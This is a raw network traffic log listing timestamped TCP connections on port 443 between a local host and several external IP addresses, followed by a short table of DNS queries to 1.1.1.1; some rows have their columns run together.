May 11, 2024 00:05:10.082261086 CEST    443    49766    91.194.11.183    192.168.2.4
May 11, 2024 00:05:10.082281113 CEST    49766    443    192.168.2.4    91.194.11.183
May 11, 2024 00:05:10.082300901 CEST    49766    443    192.168.2.4    91.194.11.183
                                                                                                                    May 11, 2024 00:05:10.082324028 CEST49766443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:05:10.082336903 CEST4434976691.194.11.183192.168.2.4
                                                                                                                    May 11, 2024 00:05:10.082355022 CEST49766443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:05:10.082371950 CEST49766443192.168.2.491.194.11.183
                                                                                                                    May 11, 2024 00:05:11.117014885 CEST49767443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:11.117052078 CEST443497673.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:11.117130041 CEST49767443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:11.117330074 CEST49767443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:11.117342949 CEST443497673.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:11.471896887 CEST443497673.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:11.472001076 CEST49767443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:11.472516060 CEST49767443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:11.472528934 CEST443497673.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:11.473735094 CEST49767443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:11.473747969 CEST443497673.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:12.055849075 CEST443497673.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:12.055917025 CEST443497673.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:12.055958033 CEST49767443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:12.055986881 CEST49767443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:12.056080103 CEST49767443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:12.056097984 CEST443497673.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:12.056122065 CEST49767443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:12.056144953 CEST49767443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:13.099071980 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.099107981 CEST4434976895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:13.099169016 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.099369049 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.099385977 CEST4434976895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:13.452290058 CEST4434976895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:13.452361107 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.458436012 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.458446026 CEST4434976895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:13.459986925 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.459992886 CEST4434976895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:13.904305935 CEST4434976895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:13.904381037 CEST4434976895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:13.904428959 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.904449940 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.904551029 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.904568911 CEST4434976895.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:05:13.904581070 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.904614925 CEST49768443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:05:13.956968069 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:13.957020998 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:13.957089901 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:13.957277060 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:13.957298994 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.308116913 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.308181047 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.308640003 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.308650017 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.309753895 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.309762001 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.828250885 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.828322887 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.828365088 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.828389883 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.829873085 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.829890013 CEST443497693.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.829901934 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.829936028 CEST49769443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:14.867353916 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:14.867377043 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:14.867460966 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:14.867676973 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:14.867687941 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.047733068 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.047821045 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.048234940 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.048243999 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.049484015 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.049494982 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.726402998 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.726459980 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.726509094 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.726552010 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.726566076 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.726608992 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.726629972 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.726650000 CEST44349770138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:15.726660967 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:15.726784945 CEST49770443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:20.773017883 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:20.773068905 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:20.773142099 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:20.773407936 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:20.773426056 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:21.129941940 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:21.130058050 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:21.130548000 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:21.130557060 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:21.131829977 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:21.131845951 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:21.474138975 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:21.474200010 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:21.474215984 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:21.474250078 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:21.474632025 CEST49771443192.168.2.43.69.236.35
                                                                                                                    May 11, 2024 00:05:21.474657059 CEST443497713.69.236.35192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.092787981 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.092823982 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.092883110 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.094007969 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.094022036 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.277106047 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.277158022 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.277740955 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.277748108 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.279454947 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.279459953 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.819932938 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.820014000 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.820014000 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.820092916 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.820152044 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.820152044 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:27.820168972 CEST44349772138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:27.820338011 CEST49772443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:32.883784056 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:32.883821964 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:32.883877993 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:32.884134054 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:32.884145021 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.064727068 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.064790010 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.065248966 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.065258026 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.067011118 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.067015886 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.599915028 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.599977016 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.600002050 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.600013971 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.600045919 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.600059986 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.600157022 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.600169897 CEST44349773138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:33.600187063 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:33.600210905 CEST49773443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:34.655008078 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:34.655052900 CEST44349774138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:34.656636953 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:34.656830072 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:34.656836033 CEST44349774138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:34.837395906 CEST44349774138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:34.837450027 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:34.837874889 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:34.837879896 CEST44349774138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:34.839570045 CEST49774443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:05:34.839575052 CEST44349774138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:05:35.373827934 CEST44349774138.124.183.215192.168.2.4
May 11, 2024 00:05:35.373893976 CEST  49774  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:35.373975992 CEST  443    49774  138.124.183.215  192.168.2.4
May 11, 2024 00:05:35.373991966 CEST  49774  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:35.374016047 CEST  49774  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:35.374053955 CEST  443    49774  138.124.183.215  192.168.2.4
May 11, 2024 00:05:35.374083042 CEST  49774  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:35.374098063 CEST  49774  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:39.430622101 CEST  49775  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:39.430635929 CEST  443    49775  138.124.183.215  192.168.2.4
May 11, 2024 00:05:39.430697918 CEST  49775  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:39.430980921 CEST  49775  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:39.430995941 CEST  443    49775  138.124.183.215  192.168.2.4
May 11, 2024 00:05:39.610713959 CEST  443    49775  138.124.183.215  192.168.2.4
May 11, 2024 00:05:39.610770941 CEST  49775  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:39.611217976 CEST  49775  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:39.611227036 CEST  443    49775  138.124.183.215  192.168.2.4
May 11, 2024 00:05:39.612639904 CEST  49775  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:39.612644911 CEST  443    49775  138.124.183.215  192.168.2.4
May 11, 2024 00:05:40.281117916 CEST  443    49775  138.124.183.215  192.168.2.4
May 11, 2024 00:05:40.281543016 CEST  443    49775  138.124.183.215  192.168.2.4
May 11, 2024 00:05:40.281569004 CEST  49775  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:40.281631947 CEST  49775  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:40.281641006 CEST  443    49775  138.124.183.215  192.168.2.4
May 11, 2024 00:05:40.281670094 CEST  49775  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:40.281723976 CEST  49775  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:40.283200026 CEST  49775  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:41.462110043 CEST  49776  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:41.462141037 CEST  443    49776  95.164.68.73     192.168.2.4
May 11, 2024 00:05:41.462196112 CEST  49776  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:41.462481976 CEST  49776  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:41.462497950 CEST  443    49776  95.164.68.73     192.168.2.4
May 11, 2024 00:05:41.807674885 CEST  443    49776  95.164.68.73     192.168.2.4
May 11, 2024 00:05:41.807809114 CEST  49776  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:41.809799910 CEST  49776  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:41.809799910 CEST  49776  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:41.809809923 CEST  443    49776  95.164.68.73     192.168.2.4
May 11, 2024 00:05:41.809824944 CEST  443    49776  95.164.68.73     192.168.2.4
May 11, 2024 00:05:42.254204988 CEST  443    49776  95.164.68.73     192.168.2.4
May 11, 2024 00:05:42.254293919 CEST  443    49776  95.164.68.73     192.168.2.4
May 11, 2024 00:05:42.254314899 CEST  49776  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:42.254456997 CEST  49776  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:42.254456997 CEST  49776  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:42.254525900 CEST  49776  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:44.207504034 CEST  49777  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:44.207562923 CEST  443    49777  104.21.16.155    192.168.2.4
May 11, 2024 00:05:44.207617044 CEST  49777  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:44.208290100 CEST  49777  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:44.208307028 CEST  443    49777  104.21.16.155    192.168.2.4
May 11, 2024 00:05:44.397622108 CEST  443    49777  104.21.16.155    192.168.2.4
May 11, 2024 00:05:44.397715092 CEST  49777  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:45.038084030 CEST  49777  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:45.038114071 CEST  443    49777  104.21.16.155    192.168.2.4
May 11, 2024 00:05:45.038441896 CEST  443    49777  104.21.16.155    192.168.2.4
May 11, 2024 00:05:45.038494110 CEST  49777  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:45.039020061 CEST  49777  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:45.080121040 CEST  443    49777  104.21.16.155    192.168.2.4
May 11, 2024 00:05:45.319808960 CEST  49778  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:45.319866896 CEST  443    49778  95.164.68.73     192.168.2.4
May 11, 2024 00:05:45.319930077 CEST  49778  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:45.320194960 CEST  49778  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:45.320205927 CEST  443    49778  95.164.68.73     192.168.2.4
May 11, 2024 00:05:45.677402973 CEST  443    49778  95.164.68.73     192.168.2.4
May 11, 2024 00:05:45.677457094 CEST  49778  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:45.677956104 CEST  49778  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:45.677962065 CEST  443    49778  95.164.68.73     192.168.2.4
May 11, 2024 00:05:45.679744959 CEST  49778  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:45.679749012 CEST  443    49778  95.164.68.73     192.168.2.4
May 11, 2024 00:05:46.170100927 CEST  443    49778  95.164.68.73     192.168.2.4
May 11, 2024 00:05:46.170213938 CEST  49778  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:46.170274973 CEST  443    49778  95.164.68.73     192.168.2.4
May 11, 2024 00:05:46.170330048 CEST  443    49778  95.164.68.73     192.168.2.4
May 11, 2024 00:05:46.170337915 CEST  49778  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:46.170337915 CEST  49778  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:46.170348883 CEST  443    49778  95.164.68.73     192.168.2.4
May 11, 2024 00:05:46.170367956 CEST  49778  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:46.170392990 CEST  49778  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:46.170392990 CEST  49778  443    192.168.2.4      95.164.68.73
May 11, 2024 00:05:48.314795017 CEST  49779  443    192.168.2.4      54.175.181.104
May 11, 2024 00:05:48.314835072 CEST  443    49779  54.175.181.104   192.168.2.4
May 11, 2024 00:05:48.316441059 CEST  49779  443    192.168.2.4      54.175.181.104
May 11, 2024 00:05:48.320326090 CEST  49779  443    192.168.2.4      54.175.181.104
May 11, 2024 00:05:48.320338964 CEST  443    49779  54.175.181.104   192.168.2.4
May 11, 2024 00:05:48.520405054 CEST  443    49779  54.175.181.104   192.168.2.4
May 11, 2024 00:05:48.520679951 CEST  49779  443    192.168.2.4      54.175.181.104
May 11, 2024 00:05:48.521970987 CEST  49779  443    192.168.2.4      54.175.181.104
May 11, 2024 00:05:48.521976948 CEST  443    49779  54.175.181.104   192.168.2.4
May 11, 2024 00:05:48.522186995 CEST  49779  443    192.168.2.4      54.175.181.104
May 11, 2024 00:05:48.522228956 CEST  443    49779  54.175.181.104   192.168.2.4
May 11, 2024 00:05:48.522351027 CEST  49779  443    192.168.2.4      54.175.181.104
May 11, 2024 00:05:51.678014994 CEST  49780  443    192.168.2.4      3.69.236.35
May 11, 2024 00:05:51.678044081 CEST  443    49780  3.69.236.35      192.168.2.4
May 11, 2024 00:05:51.678114891 CEST  49780  443    192.168.2.4      3.69.236.35
May 11, 2024 00:05:51.678450108 CEST  49780  443    192.168.2.4      3.69.236.35
May 11, 2024 00:05:51.678463936 CEST  443    49780  3.69.236.35      192.168.2.4
May 11, 2024 00:05:52.026103020 CEST  443    49780  3.69.236.35      192.168.2.4
May 11, 2024 00:05:52.026256084 CEST  49780  443    192.168.2.4      3.69.236.35
May 11, 2024 00:05:52.026602983 CEST  49780  443    192.168.2.4      3.69.236.35
May 11, 2024 00:05:52.026611090 CEST  443    49780  3.69.236.35      192.168.2.4
May 11, 2024 00:05:52.028354883 CEST  49780  443    192.168.2.4      3.69.236.35
May 11, 2024 00:05:52.028387070 CEST  443    49780  3.69.236.35      192.168.2.4
May 11, 2024 00:05:52.028487921 CEST  443    49780  3.69.236.35      192.168.2.4
May 11, 2024 00:05:52.028595924 CEST  49780  443    192.168.2.4      3.69.236.35
May 11, 2024 00:05:52.028595924 CEST  49780  443    192.168.2.4      3.69.236.35
May 11, 2024 00:05:53.082654953 CEST  443    49777  104.21.16.155    192.168.2.4
May 11, 2024 00:05:53.082722902 CEST  49777  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:53.082741022 CEST  443    49777  104.21.16.155    192.168.2.4
May 11, 2024 00:05:53.082782984 CEST  49777  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:53.082789898 CEST  443    49777  104.21.16.155    192.168.2.4
May 11, 2024 00:05:53.082799911 CEST  443    49777  104.21.16.155    192.168.2.4
May 11, 2024 00:05:53.082834959 CEST  49777  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:53.083092928 CEST  49777  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:53.083106995 CEST  443    49777  104.21.16.155    192.168.2.4
May 11, 2024 00:05:53.187452078 CEST  49781  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:53.187489033 CEST  443    49781  138.124.183.215  192.168.2.4
May 11, 2024 00:05:53.187544107 CEST  49781  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:53.187910080 CEST  49781  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:53.187923908 CEST  443    49781  138.124.183.215  192.168.2.4
May 11, 2024 00:05:53.371217012 CEST  443    49781  138.124.183.215  192.168.2.4
May 11, 2024 00:05:53.371274948 CEST  49781  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:53.371756077 CEST  49781  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:53.371762037 CEST  443    49781  138.124.183.215  192.168.2.4
May 11, 2024 00:05:53.373580933 CEST  49781  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:53.373620987 CEST  443    49781  138.124.183.215  192.168.2.4
May 11, 2024 00:05:53.373672962 CEST  49781  443    192.168.2.4      138.124.183.215
May 11, 2024 00:05:54.587270975 CEST  49782  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:54.587306976 CEST  443    49782  104.21.16.155    192.168.2.4
May 11, 2024 00:05:54.590352058 CEST  49782  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:54.590647936 CEST  49782  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:54.590662003 CEST  443    49782  104.21.16.155    192.168.2.4
May 11, 2024 00:05:54.773096085 CEST  443    49782  104.21.16.155    192.168.2.4
May 11, 2024 00:05:54.773156881 CEST  49782  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:54.773655891 CEST  49782  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:54.773664951 CEST  443    49782  104.21.16.155    192.168.2.4
May 11, 2024 00:05:54.775115967 CEST  49782  443    192.168.2.4      104.21.16.155
May 11, 2024 00:05:54.775120974 CEST  443    49782  104.21.16.155    192.168.2.4
May 11, 2024 00:05:57.462661982 CEST  49783  443    192.168.2.4      91.194.11.183
May 11, 2024 00:05:57.462696075 CEST  443    49783  91.194.11.183    192.168.2.4
May 11, 2024 00:05:57.462765932 CEST  49783  443    192.168.2.4      91.194.11.183
May 11, 2024 00:05:57.463027954 CEST  49783  443    192.168.2.4      91.194.11.183
May 11, 2024 00:05:57.463037968 CEST  443    49783  91.194.11.183    192.168.2.4
May 11, 2024 00:05:57.675482988 CEST  443    49783  91.194.11.183    192.168.2.4
May 11, 2024 00:05:57.675545931 CEST  49783  443    192.168.2.4      91.194.11.183
May 11, 2024 00:05:57.676095963 CEST  49783  443    192.168.2.4      91.194.11.183
May 11, 2024 00:05:57.676110029 CEST  443    49783  91.194.11.183    192.168.2.4
May 11, 2024 00:05:57.677645922 CEST  49783  443    192.168.2.4      91.194.11.183
May 11, 2024 00:05:57.677691936 CEST  443    49783  91.194.11.183    192.168.2.4
May 11, 2024 00:05:57.677740097 CEST  49783  443    192.168.2.4      91.194.11.183
May 11, 2024 00:06:01.100152969 CEST  49784  443    192.168.2.4      3.69.236.35
May 11, 2024 00:06:01.100197077 CEST  443    49784  3.69.236.35      192.168.2.4
May 11, 2024 00:06:01.100255013 CEST  49784  443    192.168.2.4      3.69.236.35
May 11, 2024 00:06:01.100661993 CEST  49784  443    192.168.2.4      3.69.236.35
May 11, 2024 00:06:01.100677013 CEST  443    49784  3.69.236.35      192.168.2.4
May 11, 2024 00:06:01.455171108 CEST  443    49784  3.69.236.35      192.168.2.4
May 11, 2024 00:06:01.455318928 CEST  49784  443    192.168.2.4      3.69.236.35
May 11, 2024 00:06:02.959152937 CEST  49784  443    192.168.2.4      3.69.236.35
May 11, 2024 00:06:02.959256887 CEST  443    49784  3.69.236.35      192.168.2.4
May 11, 2024 00:06:02.959311962 CEST  49784  443    192.168.2.4      3.69.236.35
May 11, 2024 00:06:11.854818106 CEST  443    49782  104.21.16.155    192.168.2.4
May 11, 2024 00:06:11.854876041 CEST  49782  443    192.168.2.4      104.21.16.155
May 11, 2024 00:06:11.854886055 CEST  443    49782  104.21.16.155    192.168.2.4
May 11, 2024 00:06:11.854926109 CEST  49782  443    192.168.2.4      104.21.16.155
May 11, 2024 00:06:11.854979038 CEST  443    49782  104.21.16.155    192.168.2.4
May 11, 2024 00:06:11.855031967 CEST  49782  443    192.168.2.4      104.21.16.155
May 11, 2024 00:06:11.855292082 CEST  49782  443    192.168.2.4      104.21.16.155
May 11, 2024 00:06:11.855308056 CEST  443    49782  104.21.16.155    192.168.2.4
Timestamp  Source Port  Dest Port  Source IP  Dest IP
May 11, 2024 00:04:12.655221939 CEST  61036  53     192.168.2.4      1.1.1.1
May 11, 2024 00:04:12.871501923 CEST  53     61036  1.1.1.1          192.168.2.4
May 11, 2024 00:04:13.858141899 CEST  49810  53     192.168.2.4      1.1.1.1
May 11, 2024 00:04:14.159241915 CEST  53     49810  1.1.1.1          192.168.2.4
May 11, 2024 00:04:18.686336040 CEST  59418  53     192.168.2.4      1.1.1.1
May 11, 2024 00:04:18.799472094 CEST  53     59418  1.1.1.1          192.168.2.4
May 11, 2024 00:04:19.608544111 CEST  55062  53     192.168.2.4      1.1.1.1
May 11, 2024 00:04:19.711488962 CEST  53     55062  1.1.1.1          192.168.2.4
May 11, 2024 00:04:35.505889893 CEST  52484  53     192.168.2.4      1.1.1.1
May 11, 2024 00:04:35.619683981 CEST  53     52484  1.1.1.1          192.168.2.4
May 11, 2024 00:05:43.047148943 CEST  63227  53     192.168.2.4      1.1.1.1
May 11, 2024 00:05:43.138046026 CEST  53     63227  1.1.1.1          192.168.2.4
May 11, 2024 00:06:00.977772951 CEST  57865  53     192.168.2.4      1.1.1.1
May 11, 2024 00:06:01.079061031 CEST  53     57865  1.1.1.1          192.168.2.4
May 11, 2024 00:06:08.749888897 CEST  53677  53     192.168.2.4      1.1.1.1
May 11, 2024 00:06:08.864455938 CEST  53     53677  1.1.1.1          192.168.2.4
